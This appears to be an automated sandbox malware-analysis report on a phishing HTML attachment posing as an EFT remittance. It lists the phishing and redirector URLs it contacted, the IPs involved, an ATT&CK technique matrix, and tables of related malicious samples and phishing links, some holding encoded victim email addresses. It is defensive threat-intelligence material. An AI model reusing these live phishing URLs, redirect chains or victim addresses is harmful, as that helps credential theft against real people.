Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: https://i2.ictacquist.ru/vm9xG/#Y#Mrtotino@grassicpas.comHTTP Parser: https://i2.ictacquist.ru/vm9xG/#Y#Mrtotino@grassicpas.com
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scripting
Boot or Logon Initialization Scripts1
Deobfuscate/Decode Files or Information
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://fascia.fit/.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSY0%Avira URL Cloudsafe
https://i2.ictacquist.ru/vm9xG/100%Avira URL Cloudphishing
file:///C:/Users/user/Desktop/EFT%20Remittance_(Rtotino)CQDM.html0%Avira URL Cloudsafe
https://hjhyx.br-izeffs.ru/tatay$ylatfyo0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
code.jquery.com
151.101.66.137
truefalse
    high
    developers.cloudflare.com
    104.16.2.189
    truefalse
      high
      hjhyx.br-izeffs.ru
      104.21.96.1
      truefalse
        unknown
        cdnjs.cloudflare.com
        104.17.24.14
        truefalse
          high
          challenges.cloudflare.com
          104.18.95.41
          truefalse
            high
            i2.ictacquist.ru
            104.21.48.1
            truetrue
              unknown
              www.google.com
              142.250.181.228
              truefalse
                high
                fascia.fit
                103.83.194.5
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://fascia.fit/.res444.php?2-68747470733a2f2f69322e696374616371756973742e72752f766d3978472f-NfnOSYfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                    high
                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                      high
                      https://developers.cloudflare.com/favicon.pngfalse
                        high
                        https://i2.ictacquist.ru/vm9xG/#membershipfalse
                          unknown
                          https://i2.ictacquist.ru/vm9xG/true
                          • Avira URL Cloud: phishing
                          unknown
                          https://i2.ictacquist.ru/vm9xG/#workoutsfalse
                            unknown
                            https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                              high
                              https://challenges.cloudflare.com/turnstile/v0/g/0e3e6804b971/api.jsfalse
                                high
                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.jsfalse
                                  high
                                  file:///C:/Users/user/Desktop/EFT%20Remittance_(Rtotino)CQDM.htmltrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://hjhyx.br-izeffs.ru/tatay$ylatfyofalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://i2.ictacquist.ru/vm9xG/#Y#Mrtotino@grassicpas.comtrue
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    104.21.48.1
                                    i2.ictacquist.ruUnited States
                                    13335CLOUDFLARENETUStrue
                                    103.83.194.5
                                    fascia.fitUnited States
                                    132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                    104.17.24.14
                                    cdnjs.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    104.18.95.41
                                    challenges.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    239.255.255.250
                                    unknownReserved
                                    unknownunknownfalse
                                    142.250.181.228
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    104.21.96.1
                                    hjhyx.br-izeffs.ruUnited States
                                    13335CLOUDFLARENETUSfalse
                                    151.101.66.137
                                    code.jquery.comUnited States
                                    54113FASTLYUSfalse
                                    151.101.194.137
                                    unknownUnited States
                                    54113FASTLYUSfalse
                                    104.16.2.189
                                    developers.cloudflare.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    IP
                                    192.168.2.6
                                    192.168.2.5
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1619379
                                    Start date and time:2025-02-19 20:39:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowshtmlcookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:7
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:EFT Remittance_(Rtotino)CQDM.html
                                    Detection:MAL
                                    Classification:mal72.phis.evad.winHTML@31/27@30/12
                                    Cookbook Comments:
                                    • Found application associated with file extension: .html
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 142.250.184.227, 74.125.71.84, 142.250.185.142, 142.250.185.238, 142.250.186.174, 216.58.212.174, 142.250.184.234, 142.250.185.74, 142.250.186.170, 216.58.206.42, 142.250.186.138, 142.250.185.234, 142.250.185.106, 216.58.206.74, 172.217.16.202, 216.58.212.138, 142.250.185.202, 172.217.18.10, 142.250.185.138, 142.250.185.170, 142.250.181.234, 142.250.184.202, 2.17.190.73, 217.20.57.38, 142.250.74.206, 142.250.185.78, 172.217.16.142, 142.250.186.131, 142.250.185.174, 172.217.16.206, 142.250.186.99, 142.250.186.46, 142.250.184.238, 216.58.206.78, 199.232.214.172, 142.250.186.78, 13.107.246.45, 92.123.18.162, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): clients1.google.com, client.wns.windows.com, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    No simulations
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    104.21.48.1install.exeGet hashmaliciousBabadedaBrowse
                                    • api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
                                    ZmK1CAc4VP.exeGet hashmaliciousFormBookBrowse
                                    • www.tumbetgirislinki.fit/4wrd/
                                    uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                    • www.lucynoel6465.shop/jgkl/
                                    QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                    • www.lucynoel6465.shop/am6a/
                                    LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                    • www.tumbetgirislinki.fit/k566/
                                    laserl.ps1Get hashmaliciousFormBookBrowse
                                    • www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
                                    laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                    • www.tumbetgirislinki.fit/k566/
                                    DHL parcel.exeGet hashmaliciousFormBookBrowse
                                    • www.kdrqcyusevx.info/q64t/
                                    BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                                    • www.newanthoperso.shop/y5uj/
                                    DDT-5080-ST233.exeGet hashmaliciousFormBookBrowse
                                    • www.sigaque.today/vyp9/
                                    103.83.194.5https://xjh7bk49.r.ap-southeast-2.awstrack.me/L0/https:%2F%2Fwww.google.co.in%2Furl%3Fsa==vjKpBaQLpQHvS1PmbhjfQh2MZOm%26rct=3iDDeRIUXr7S6LM6zidxN66zaYNJJZ5uNkn5rHJaI4t4qPP8DWVO1CvZVrepUv4LpX%26sa=t%26url=amp%2Fsouthdakotacannabisdoctors.com%2Fyes%2Fport%2FIsjR3uyjLQFu2NNvooFw2%2Fd2Zsb3JlbnRpbm9AZXNwZXJpb24uY29t/1/0108019498dc9698-c28d53cc-593c-4ccb-a609-76d243112b3f-000000/ABQm9rBJLVsJGlg3PuVXRXBptDI=191&c=E,1,evnTsmcgcysrNqkRD0O-1WQRUeSPuEJ91kARRfaRPYomDXM7_8LzuEjTBUwIOx_M1zJRuiZTdEHJwjdmV3XUzNtBsS-BHGDdMGwRIQxU57Nc5ykGet hashmaliciousHTMLPhisherBrowse
                                    • southdakotacannabisdoctors.com/favicon.ico
                                    https://google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=30ba685b120fd532f5c02d94fce85696wDnNeW8yycT&sa=t&esrc=nTgV8F30ba685b120fd532f5c02d94fce85696A0xys8Em2FL&source=&cd=tS6T830ba685b120fd532f5c02d94fce85696Tiw9XH&cad=JxWzDfBP30ba685b120fd532f5c02d94fce85696VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2fdrawnbydrew.com/helosuns/30ba685b120fd532f5c02d94fce85696/dGhha2VuZXdlcnRoQG12dHJhbnNpdC5jb20=Get hashmaliciousHTMLPhisherBrowse
                                    • drawnbydrew.com/favicon.ico
                                    https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Ffairwaygilbert.com%2Fnew%2FdtMyxOyre1WJ8xvj5DnN7kDa/Y2hyaXMuaGF3a2luc0BwZXJyeWhvbWVzLmNvbQ==Get hashmaliciousTycoon2FABrowse
                                    • fairwaygilbert.com/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bro%C2%ADund%C2%ADth%C2%ADes%C2%ADo%C2%ADun%C2%ADd.%E2%80%8Bne%C2%ADt%2Ffdht%2Fnew%2FkIxgmfjJBl7ESvapw2Nj3wIo/YW5kcmV3Lm5nQHN1bnZlbnR1cmUuY29tGet hashmaliciousUnknownBrowse
                                    • roundthesound.net/favicon.ico
                                    https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wD5CHARyycT&sa=t&esrc=2Dv8p65dFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fcells2go.co%2Fone%2F.me%2FCy0cxTT1O745SqR1gfrta/ZGFycmVuLmhvbG1lc0BwZXJyeWhvbWVzLmNvbGet hashmaliciousHTMLPhisherBrowse
                                    • cells2go.co/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ffilmycurry.in%2Fskoda%2FhV8TfP7Y5ayrff8B7Nw6fATk/YWcucmVwbGllc0BhZy5zdGF0ZS5tbi51cw==Get hashmaliciousHTMLPhisherBrowse
                                    • filmycurry.in/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fsmmpanel.com.br%2Ffghd%2Fgfjfjfg%2FiPI0CfdWB2bcqygtvoHIMLiX/d2VzbGV5LmFsZXhhbmRlckByaXNlcG9pbnQuY29tGet hashmaliciousUnknownBrowse
                                    • smmpanel.com.br/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bro%C2%ADund%C2%ADth%C2%ADes%C2%ADo%C2%ADun%C2%ADd.%E2%80%8Bne%C2%ADt%2Ffdht%2Fnew%2F7cqxIbF4tswA41n12hOY542d/Y2FuZGlkYS5nb3JhZGlhQGp1bWVpcmFoLmNvbQ==Get hashmaliciousUnknownBrowse
                                    • roundthesound.net/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Faggarwaltradersindia.in%2Fskoda%2FX3HOVMfsCLBJWP5GhJNdLWwq/bmlyYXYuZGVzYWlAbHJxYS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                    • aggarwaltradersindia.in/favicon.ico
                                    https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bro%C2%ADund%C2%ADth%C2%ADes%C2%ADo%C2%ADun%C2%ADd.%E2%80%8Bne%C2%ADt%2Ffdht%2Fnew%2FqHbGk7oyANkRwIrkDp4OWdx2/am9obi5oaW5ndGdlbkBlbmVyZ3kuY2EuZ292Get hashmaliciousUnknownBrowse
                                    • roundthesound.net/favicon.ico
                                    104.17.24.14Proforma.Invoice.Payment.$$.htmlGet hashmaliciousUnknownBrowse
                                    • cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
                                    http://vtaurl.comGet hashmaliciousUnknownBrowse
                                    • cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
                                    http://Voyages.CNTraveler.comGet hashmaliciousUnknownBrowse
                                    • cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    challenges.cloudflare.comhttps://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.18.95.41
                                    https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0bGet hashmaliciousHTMLPhisherBrowse
                                    • 104.18.95.41
                                    http://loginmicrosoftonlinesettings.utzsnacks.ventarronllanero.com/reset/authorize?email=priceandpromosupport@utzsnacks.comGet hashmaliciousHTMLPhisherBrowse
                                    • 104.18.94.41
                                    https://malvinasrock.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%202/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.18.95.41
                                    https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousHTMLPhisherBrowse
                                    • 104.18.94.41
                                    https://microsoftsmailfXHvPDaOlj.iparyamp.ru/EPPc9bab/#aW5mb0BjaXR5ZGV2LmJydXNzZWxzGet hashmaliciousUnknownBrowse
                                    • 104.18.95.41
                                    https://rnicrosoft-secured-office.squarespace.com/sharepointcoc?e=bob_smith@gmail.comGet hashmaliciousHTMLPhisherBrowse
                                    • 104.18.95.41
                                    AUDlO-Rec_(Connie.dixon).htmGet hashmaliciousUnknownBrowse
                                    • 104.18.94.41
                                    http://crypto-support.pages.dev/wallets.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.18.94.41
                                    https://crypto-support.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.18.95.41
                                    developers.cloudflare.comhttps://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.16.5.189
                                    https://microsoftsmailfXHvPDaOlj.iparyamp.ru/EPPc9bab/#aW5mb0BjaXR5ZGV2LmJydXNzZWxzGet hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    http://webdefence.global.blackspider.com/urlwrap/?q=AXicLc3JTcUwFEbh-xpKPOeChEDsEIge7N_2S5TBKHYY1rRBb7TCuP6OdE4nel-JPl6I9uVNirGr-3O3-mlB2dpelg5lJSvvHh5vX--lscyGAN_STU049qO2hHErSzlPqf7GY2tP9bLvZz93tRxbTLUt0zb_YI_Uo3dDMNFCWoUklBIIKrBy8g-CuxCQzAqcoDPLwP_AeoDnaJ0LUnlpcr6u03nz7djTleEIaJHgvIjaRmuizM4OTopgRVQWzGIYPAIy5--zh9YBwrM1SRhFRJ8g-gI_SFND&ZGet hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    Ymcaret W-2,Tax_Return.pdfGet hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    https://tapbiolink.com/sdcranebuildersincdocumentGet hashmaliciousUnknownBrowse
                                    • 104.16.5.189
                                    https://atlanticwaste.sharefile.com/public/share/web-scc72ae51fb864535b26f2da47d39a751Get hashmaliciousUnknownBrowse
                                    • 104.16.4.189
                                    https://lsx.xiridon.ru/6tLSEWM/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.16.5.189
                                    Invisalert Solutions Revised Billing Proposal for 2025.pdfGet hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    https://nw.eneturkylana.ru/AsACE/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.16.5.189
                                    https://LsX.xiridon.ru/6tLSEWM/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.16.2.189
                                    cdnjs.cloudflare.comhttp://www.antham.com/Get hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    https://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    URGENT_SUBSCRIPTION_STATUS.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.24.14
                                    http://era.caGet hashmaliciousUnknownBrowse
                                    • 104.17.25.14
                                    https://microsoftsmailfXHvPDaOlj.iparyamp.ru/EPPc9bab/#aW5mb0BjaXR5ZGV2LmJydXNzZWxzGet hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    https://ashmithraj069.github.io/Amazon-Clone/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.17.24.14
                                    https://case-id-100987776649.mfbsp1324.click/Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    https://case-id-100987772755.mfbsp1324.click/Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    http://case-id-1000292829268661.mashstaffing.com/Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    http://case-id-1000292829266398.mashstaffing.com/Get hashmaliciousUnknownBrowse
                                    • 104.17.24.14
                                    code.jquery.comhttps://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 151.101.194.137
                                    https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0bGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.66.137
                                    URGENT_SUBSCRIPTION_STATUS.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.130.137
                                    https://docs.google.com/presentation/d/e/2PACX-1vR9fDeGf5MUCkInjRJmTQP_A7A1KiesFeAK7tBzfJ0WswmG-_qOqxWXat0f6mojkSTW_rQDaj-I4ALz/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                    • 151.101.194.137
                                    Donaldson-required specs-documents.pdf(1).htmlGet hashmaliciousUnknownBrowse
                                    • 151.101.2.137
                                    https://atstrack.com/customer-support/software.htmlGet hashmaliciousUnknownBrowse
                                    • 151.101.130.137
                                    https://appurl.io/F_tBwtMcbkGet hashmaliciousUnknownBrowse
                                    • 151.101.2.137
                                    https://malvinasrock.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%202/Get hashmaliciousHTMLPhisherBrowse
                                    • 151.101.66.137
                                    https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousHTMLPhisherBrowse
                                    • 151.101.194.137
                                    DUE INVOICES #97643592.htmGet hashmaliciousHTMLPhisherBrowse
                                    • 151.101.2.137
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSBibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    Researches.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    http://www.antham.com/Get hashmaliciousUnknownBrowse
                                    • 104.22.8.215
                                    https://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    Details2200902015.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 104.21.64.1
                                    http://content.vibly.itGet hashmaliciousUnknownBrowse
                                    • 104.16.79.73
                                    one.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    PO#6536983.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                    • 104.21.112.1
                                    https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0bGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.80.1
                                    b4.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    CLOUDFLARENETUSBibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    Researches.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    http://www.antham.com/Get hashmaliciousUnknownBrowse
                                    • 104.22.8.215
                                    https://www.google.com/url?q=https%3A%2F%2Fyir.myvnc.com%2Fosh%2F&sa=D&sntz=1&usg=AOvVaw0upYvHpDviVW9Wdi9s8ilT#SILENTCODERSLIMAHURUFE-SUREOSHAYmdvZWRlY2tlQHN3ZWVwaW5nY29ycC5jb20=Get hashmaliciousUnknownBrowse
                                    • 104.16.2.189
                                    Details2200902015.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • 104.21.64.1
                                    http://content.vibly.itGet hashmaliciousUnknownBrowse
                                    • 104.16.79.73
                                    one.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    PO#6536983.cmdGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                    • 104.21.112.1
                                    https://www.envoice.in/invoice/attachment?token=KVuGLoehNae1TTmcoP5fURVZa2Clb4uoU54ZN62dm5bt4GI5SbJSW4i0gvqX8OqC8du8FWxO1FyKUMdXWD85tucV981ZqOB32A7Io9cUN81nVPlXDT5TwIo4bnOJevlP&obfuscatedFileName=1739953701-K0XOHIfac9FrSomhOQ0bGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.80.1
                                    b4.elfGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    CLOUDFLARENETUSBibliofils.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    Researches.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 104.21.32.1
                                    http://www.antham.com/Get hashmaliciousUnknownBrowse
                                    • 104.22.8.215
